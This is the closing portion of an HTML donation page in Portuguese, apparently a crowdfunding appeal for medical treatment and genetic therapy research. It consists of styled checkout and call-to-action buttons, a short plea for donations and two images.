<div class="button-NSMlIf6674304">
<style>
a.button-NSMlIf6674304-element {
background: #35cb4a;
border-radius: 4px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-NSMlIf6674304-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-NSMlIf6674304-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-NSMlIf6674304-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href=".../ajude/checkout/1000" target="_blank" class="btn button-NSMlIf6674304-element ">
R$: 1000,00
</a>
</div>
</div>
</div>
<div class="button-QYoqql5828633">
<style>
a.button-QYoqql5828633-element {
background: #35cb4a;
border-radius: 8px;
border: none;
color: #ffffff;
padding: 16px 32px 16px 32px;
font-weight: 600;
display: block;
width: fit-content;
text-align: center;
margin: 2vh auto 2vh auto;
font-size: 1.49vw;
box-sizing: border-box;
max-width: 100%;
transition: all 0.5s ease-in-out;
}
a.button-QYoqql5828633-element:hover {
filter: brightness(1.2);
}
@media (max-width: 1200px) {
a.button-QYoqql5828633-element {
font-size: 1.69vw;
margin: 1.32vh auto 1.5vh auto;
padding: 8px 16px 8px 16px;
}
}
@media (max-width: 640px) {
a.button-QYoqql5828633-element {
font-size: 3.94vw;
padding: 12px 24px 12px 24px;
margin: 1vh auto 1vh auto;
width: ;
}
}
</style>
<a href="#division-NnwbNS4961309" target="_self" class="btn button-QYoqql5828633-element ">
SUA AJUDA IMPORTA MUITO 🤍
</a>
</div>
</div>
</div>
<div class="division-vpcGwi5237261__wrapper">
<style>
#division-vpcGwi5237261 {
border: none;
border-radius: ;
margin: 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-vpcGwi5237261 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0;
}
}
@media (max-width:600px) {
#division-vpcGwi5237261 {
margin: 0;
padding: 1.5vh 1.5vw 1.5vh 1.5vw;
}
}
</style>
<div id="division-vpcGwi5237261" class="xaRwjQ7620176">
<div class="subheadline-wzdMIY5242861">
<style>
.subheadline-wzdMIY5242861-element h2 {
font-size: 1.65vw;
text-align: center;
padding-top: 2vh;
padding-bottom: 2vh;
color: #939191;
line-height: 1.1;
font-weight: 400;
letter-spacing: px;
false
}
@media (max-width: 1200px) {
.subheadline-wzdMIY5242861-element h2 {
font-size: 2.50vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
}
}
@media (max-width: 640px) {
.subheadline-wzdMIY5242861-element h2 {
font-size: 4.50vw;
padding-top: 1.5vh;
padding-bottom: 1.5vh;
text-align: center;
}
}
</style>
<div class="subheadline-wzdMIY5242861-element subheadline">
<h2>
Através dessa Vakinha do instituto Vakinha Online, estamos buscando apoio financeiro para custear tratamentos vitais e impulsionar a pesquisa em terapias genéticas.<br><br>Sua doação não apenas faz a diferença, ela representa a construção de um futuro com menos dor para ter uma vida feliz!<br><br>Faça sua parte, doar é amar, Deus te dará tudo em dobro!
</h2>
</div>
</div>
</div>
</div>
<div class="division-SKgaEr2689603__wrapper">
<style>
#division-SKgaEr2689603 {
border: none;
border-radius: ;
margin: 0 0 0 0;
position: relative;
padding: 3vh 20vw 3vh 20vw;
background-color: #ffffff;
}
@media (max-width:1200px) {
#division-SKgaEr2689603 {
padding: 2.25vh 15vw 2.25vh 15vw;
margin: 0 0 0 0;
}
}
@media (max-width:600px) {
#division-SKgaEr2689603 {
margin: 0 0 0 0;
padding: 0.75vh 0.75vw 0.75vh 0.75vw;
}
}
</style>
<div id="division-SKgaEr2689603" class="BGaFfk7620177">
<div class="image-kYdrbX1111657">
<style>
.image-kYdrbX1111657-element img {
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: NaNvh;
margin-top: NaNvh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-kYdrbX1111657-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-kYdrbX1111657-element img {
max-width: 100%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-kYdrbX1111657-element">
<img loading="lazy" src="images/vRMHQD1121354.png" alt="">
</div>
</div>
<div class="image-IolYJD6223013">
<style>
.image-IolYJD6223013-element img {
display: block;
margin-left: auto;
margin-right: auto;
margin-bottom: NaNvh;
margin-top: NaNvh;
max-width: 20%;
border-radius: 0;
border: none;
}
@media (max-width: 1200px) {
.image-IolYJD6223013-element img {
max-width: 18%;
}
}
@media (max-width: 600px) {
.image-IolYJD6223013-element img {
max-width: 100%;
margin-left:auto;margin-right:auto;
}
}
</style>
<div class="image-IolYJD6223013-element">
<img loading="lazy" src="images/gHflXD1150478.png" alt="">
</div>
</div>
</div>
</div>

</body></html>